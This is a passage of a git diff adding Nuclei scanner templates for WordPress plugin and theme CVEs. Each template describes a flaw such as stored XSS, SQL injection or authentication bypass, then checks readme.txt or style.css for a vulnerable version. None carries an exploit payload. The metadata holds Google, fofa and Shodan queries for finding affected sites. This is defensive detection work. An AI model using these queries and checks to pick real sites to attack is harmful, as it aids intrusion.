low + description: > + The ScanCircle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'scancircle' shortcode in all versions up to, and including, 2.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/27cc6931-086c-43a5-965b-2a19f15bb356?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11439 + metadata: + fofa-query: "wp-content/plugins/scancircle/" + google-query: inurl:"/wp-content/plugins/scancircle/" + shodan-query: 'vuln:CVE-2024-11439' + tags: cve,wordpress,wp-plugin,scancircle,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/scancircle/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "scancircle" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11740-0129d5469319a449ba4a4cece10b2475.yaml b/poc/cve/CVE-2024-11740-0129d5469319a449ba4a4cece10b2475.yaml new file mode 100644 index 0000000000..7a7a095578 --- /dev/null +++ b/poc/cve/CVE-2024-11740-0129d5469319a449ba4a4cece10b2475.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11740-0129d5469319a449ba4a4cece10b2475 + +info: + name: > + Download Manager <= 3.3.03 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: high + description: > + The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a7be578-5883-4cd3-963d-bf81c3af2003?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-11740 + metadata: + fofa-query: "wp-content/plugins/download-manager/" + google-query: inurl:"/wp-content/plugins/download-manager/" + shodan-query: 'vuln:CVE-2024-11740' + tags: cve,wordpress,wp-plugin,download-manager,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/download-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "download-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.03') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11748.yaml b/poc/cve/CVE-2024-11748.yaml new file mode 100644 index 0000000000..812a3b9f84 --- /dev/null +++ b/poc/cve/CVE-2024-11748.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11748-15ab22025f25319cc075ac10ba230d57 + +info: + name: > + Taeggie Feed <= 0.1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Taeggie Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'taeggie-feed' shortcode in all versions up to, and including, 0.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/65d11459-5cad-4d8b-a81d-7f0dd4342a52?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11748 + metadata: + fofa-query: "wp-content/plugins/taeggie-feed/" + google-query: inurl:"/wp-content/plugins/taeggie-feed/" + shodan-query: 'vuln:CVE-2024-11748' + tags: cve,wordpress,wp-plugin,taeggie-feed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/taeggie-feed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "taeggie-feed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.1.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11768-0f86f52c54d00831befe297b09b8631b.yaml b/poc/cve/CVE-2024-11768-0f86f52c54d00831befe297b09b8631b.yaml new file mode 100644 index 0000000000..c84c98aac5 --- /dev/null +++ b/poc/cve/CVE-2024-11768-0f86f52c54d00831befe297b09b8631b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11768-0f86f52c54d00831befe297b09b8631b + +info: + name: > + Download manager <= 3.3.03 - Improper Authorization to Unauthenticated Download of Password-Protected Files + author: topscoder + severity: medium + description: > + The Download Manager plugin for WordPress is vulnerable to unauthorized download of password-protected content due to improper password validation on the checkFilePassword function in all versions up to, and including, 3.3.03. This makes it possible for unauthenticated attackers to download password-protected files. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/feb915f4-66d6-4f46-949c-5354e414319b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-11768 + metadata: + fofa-query: "wp-content/plugins/download-manager/" + google-query: inurl:"/wp-content/plugins/download-manager/" + shodan-query: 'vuln:CVE-2024-11768' + tags: cve,wordpress,wp-plugin,download-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/download-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "download-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.03') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11881.yaml b/poc/cve/CVE-2024-11881.yaml new file mode 100644 index 0000000000..6e6dc2fd8c --- /dev/null +++ b/poc/cve/CVE-2024-11881.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11881-28951564b40a53810677e572dcba4e96 + +info: + name: > + Easy Waveform Player <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Easy Waveform Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'easywaveformplayer' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/17a0d8b3-e54d-4af4-8915-e8b192cc138b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11881 + metadata: + fofa-query: "wp-content/plugins/easy-waveform-player/" + google-query: inurl:"/wp-content/plugins/easy-waveform-player/" + shodan-query: 'vuln:CVE-2024-11881' + tags: cve,wordpress,wp-plugin,easy-waveform-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-waveform-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-waveform-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11912.yaml b/poc/cve/CVE-2024-11912.yaml new file mode 100644 index 0000000000..a4abd4dd49 --- /dev/null +++ b/poc/cve/CVE-2024-11912.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11912-6ccaac05572b45a2acb0cf1f38c333a9 + +info: + name: > + Traveler <= 3.1.6 - Unauthenticated SQL Injection via order_id + author: topscoder + severity: critical + description: > + The Travel Booking WordPress Theme theme for WordPress is vulnerable to blind time-based SQL Injection via the ‘order_id’ parameter in all versions up to, and including, 3.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/febd1ff3-3a1a-49c2-b210-9e72051e3172?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-11912 + metadata: + fofa-query: "wp-content/themes/traveler/" + google-query: inurl:"/wp-content/themes/traveler/" + shodan-query: 'vuln:CVE-2024-11912' + tags: cve,wordpress,wp-theme,traveler,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/traveler/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "traveler" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11926.yaml b/poc/cve/CVE-2024-11926.yaml new file mode 100644 index 0000000000..c7c096f781 --- /dev/null +++ b/poc/cve/CVE-2024-11926.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11926-3eda00250e08ecc30fa30e5fb71ad416 + +info: + name: > + Traveler <= 3.1.6 - Missing Authorization in Several AJAX Actions + author: topscoder + severity: low + description: > + The Travel Booking WordPress Theme theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '__stPartnerCreateServiceRental', 'st_delete_order_item', '_st_partner_approve_booking', 'save_order_item', and '__userDenyEachInfo' functions in all versions up to, and including, 3.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify posts, delete posts and pages, approve arbitrary orders, insert orders with arbitrary prices, and deny user information. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d21c7537-8437-43aa-ab52-9e14d27a6e7f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cve-id: CVE-2024-11926 + metadata: + fofa-query: "wp-content/themes/traveler/" + google-query: inurl:"/wp-content/themes/traveler/" + shodan-query: 'vuln:CVE-2024-11926' + tags: cve,wordpress,wp-theme,traveler,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/traveler/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "traveler" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12025.yaml b/poc/cve/CVE-2024-12025.yaml new file mode 100644 index 0000000000..da6e1954fb --- /dev/null +++ b/poc/cve/CVE-2024-12025.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12025-4c9c64b61165ebb81c12eb54c60dfa5f + +info: + name: > + Collapsing Categories <= 3.0.8 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The Collapsing Categories plugin for WordPress is vulnerable to SQL Injection via the 'taxonomy' parameter of the /wp-json/collapsing-categories/v1/get REST API in all versions up to, and including, 3.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/05153b11-2f26-425e-99ab-93216861802b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-12025 + metadata: + fofa-query: "wp-content/plugins/collapsing-categories/" + google-query: inurl:"/wp-content/plugins/collapsing-categories/" + shodan-query: 'vuln:CVE-2024-12025' + tags: cve,wordpress,wp-plugin,collapsing-categories,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/collapsing-categories/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "collapsing-categories" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12061.yaml b/poc/cve/CVE-2024-12061.yaml new file mode 100644 index 0000000000..a5052bf851 --- /dev/null +++ b/poc/cve/CVE-2024-12061.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12061-b41bc216e05397f68e1c316d11d953c1 + +info: + name: > + Events Addon for Elementor <= 2.2.3 - Authenticated (Contributor+) Post Disclosure + author: topscoder + severity: low + description: > + The Events Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.3 via the naevents_elementor_template shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f59d9d8a-467a-4920-963a-da45f1f4462f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12061 + metadata: + fofa-query: "wp-content/plugins/events-addon-for-elementor/" + google-query: inurl:"/wp-content/plugins/events-addon-for-elementor/" + shodan-query: 'vuln:CVE-2024-12061' + tags: cve,wordpress,wp-plugin,events-addon-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/events-addon-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "events-addon-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml b/poc/cve/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml new file mode 100644 index 0000000000..f43546f837 --- /dev/null +++ b/poc/cve/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c + +info: + name: > + Broken Link Checker | Finder <= 2.5.0 - Authenticated (Author+) Blind Server-Side Request Forgery + author: topscoder + severity: low + description: > + The Broken Link Checker | Finder plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.5.0 via the 'moblc_check_link' function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa52034e-3d11-4be5-ab8b-8f7256be2a3e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-12121 + metadata: + fofa-query: "wp-content/plugins/broken-link-finder/" + google-query: inurl:"/wp-content/plugins/broken-link-finder/" + shodan-query: 'vuln:CVE-2024-12121' + tags: cve,wordpress,wp-plugin,broken-link-finder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/broken-link-finder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "broken-link-finder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12250.yaml b/poc/cve/CVE-2024-12250.yaml new file mode 100644 index 0000000000..3debbac7c6 --- /dev/null +++ b/poc/cve/CVE-2024-12250.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12250-1ea7392f59e0ddf4978022124851bf49 + +info: + name: > + Accept Authorize.NET Payments Using Contact Form 7 <= 2.2 - Unauthenticated Information Exposure + author: topscoder + severity: medium + description: > + The Accept Authorize.NET Payments Using Contact Form 7 plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2 via the cf7adn-info.php file. This makes it possible for unauthenticated attackers to extract configuration data which can be used to aid in other attacks. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d8801b9a-afcb-483b-a018-4f68448e96de?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-12250 + metadata: + fofa-query: "wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/" + google-query: inurl:"/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/" + shodan-query: 'vuln:CVE-2024-12250' + tags: cve,wordpress,wp-plugin,accept-authorize-net-payments-using-contact-form-7,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "accept-authorize-net-payments-using-contact-form-7" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12259.yaml b/poc/cve/CVE-2024-12259.yaml new file mode 100644 index 0000000000..1bcd531ff0 --- /dev/null +++ b/poc/cve/CVE-2024-12259.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12259-344ffbf5ed79000bc36568816138482f + +info: + name: > + CRM WordPress Plugin – RepairBuddy <= 3.8120 - Missing Authorization to Account Takeover/Privilege Escalation + author: topscoder + severity: low + description: > + The CRM WordPress Plugin – RepairBuddy plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.8120. This is due to the plugin not properly validating a user's identity prior to updating their email through the wc_update_user_data AJAX action. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80997d2f-3e16-48f6-969b-58844cb83d53?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-12259 + metadata: + fofa-query: "wp-content/plugins/computer-repair-shop/" + google-query: inurl:"/wp-content/plugins/computer-repair-shop/" + shodan-query: 'vuln:CVE-2024-12259' + tags: cve,wordpress,wp-plugin,computer-repair-shop,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/computer-repair-shop/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "computer-repair-shop" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.8120') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12287.yaml b/poc/cve/CVE-2024-12287.yaml new file mode 100644 index 0000000000..45f80c6127 --- /dev/null +++ b/poc/cve/CVE-2024-12287.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12287-8c4acd957f17d47a30609f0209cc76f3 + +info: + name: > + Biagiotti Membership <= 1.0.2 - Authentication Bypass via biagiotti_membership_check_facebook_user + author: topscoder + severity: critical + description: > + The Biagiotti Membership plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.0.2. This is due to the plugin not properly verifying a user's identity prior to authenticating them. This makes it possible for unauthenticated attackers to log in as other users, such as administrators, granted they have access to an email. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f319df-41eb-484a-8fca-af6ae76f4179?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-12287 + metadata: + fofa-query: "wp-content/plugins/biagiotti-membership/" + google-query: inurl:"/wp-content/plugins/biagiotti-membership/" + shodan-query: 'vuln:CVE-2024-12287' + tags: cve,wordpress,wp-plugin,biagiotti-membership,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/biagiotti-membership/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "biagiotti-membership" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12331-1b3375d194cd3870eb15fbe759b10ed7.yaml b/poc/cve/CVE-2024-12331-1b3375d194cd3870eb15fbe759b10ed7.yaml new file mode 100644 index 0000000000..48fb94150b --- /dev/null +++ b/poc/cve/CVE-2024-12331-1b3375d194cd3870eb15fbe759b10ed7.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12331-1b3375d194cd3870eb15fbe759b10ed7 + +info: + name: > + File Manager Pro – Filester <= 1.8.6 - Missing Authorization to Authenticated (Subscriber+) Filebird Plugin Installation + author: topscoder + severity: low + description: > + The File Manager Pro – Filester plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_install_plugin' function in all versions up to, and including, 1.8.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install the Filebird plugin. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b09bfff-4d6e-4de0-b6ab-6ac27c4f2be6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12331 + metadata: + fofa-query: "wp-content/plugins/filester/" + google-query: inurl:"/wp-content/plugins/filester/" + shodan-query: 'vuln:CVE-2024-12331' + tags: cve,wordpress,wp-plugin,filester,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/filester/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "filester" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12340.yaml b/poc/cve/CVE-2024-12340.yaml new file mode 100644 index 0000000000..3ce52c087d --- /dev/null +++ b/poc/cve/CVE-2024-12340.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12340-e574ab0a95b2364359c38e28de3f4115 + +info: + name: > + Animation Addons for Elementor <= 1.1.6 - Authenticated (Contributor+) Sensitive Information Exposure via Content Slider and Tabs Widget Elementor Template + author: topscoder + severity: low + description: > + The Animation Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6 via the 'render' function in widgets/content-slider.php and widgets/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a0136e2-97f5-4368-a805-0f60d1b8ad11?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12340 + metadata: + fofa-query: "wp-content/plugins/animation-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/animation-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-12340' + tags: cve,wordpress,wp-plugin,animation-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/animation-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "animation-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12432.yaml b/poc/cve/CVE-2024-12432.yaml new file mode 100644 index 0000000000..eb692d6ec9 --- /dev/null +++ b/poc/cve/CVE-2024-12432.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12432-5b5915220e6a42abeb51e9b392575c63 + +info: + name: > + WPC Shop as a Customer for WooCommerce <= 1.2.8 - Authentication Bypass Due to Insufficiently Unique Key + author: topscoder + severity: low + description: > + The WPC Shop as a Customer for WooCommerce plugin for WordPress is vulnerable to account takeover and privilege escalation in all versions up to, and including, 1.2.8. This is due to the 'generate_key' function not producing a sufficiently random value. This makes it possible for authenticated attackers, with Subscriber-level access and above, to log in as site administrators, granted they have triggered the ajax_login() function which generates a unique key that can be used to log in. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/048625e8-10b7-418d-a13b-329f1d7e0171?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-12432 + metadata: + fofa-query: "wp-content/plugins/wpc-shop-as-customer/" + google-query: inurl:"/wp-content/plugins/wpc-shop-as-customer/" + shodan-query: 'vuln:CVE-2024-12432' + tags: cve,wordpress,wp-plugin,wpc-shop-as-customer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpc-shop-as-customer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpc-shop-as-customer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12449.yaml b/poc/cve/CVE-2024-12449.yaml new file mode 100644 index 0000000000..3a52bc6d9d --- /dev/null +++ b/poc/cve/CVE-2024-12449.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12449-8a82767d9800d12163c96ba6ad7adf65 + +info: + name: > + Video Share VOD – Turnkey Video Site Builder Script <= 2.6.30 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Video Share VOD – Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_player_html' shortcode in all versions up to, and including, 2.6.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it 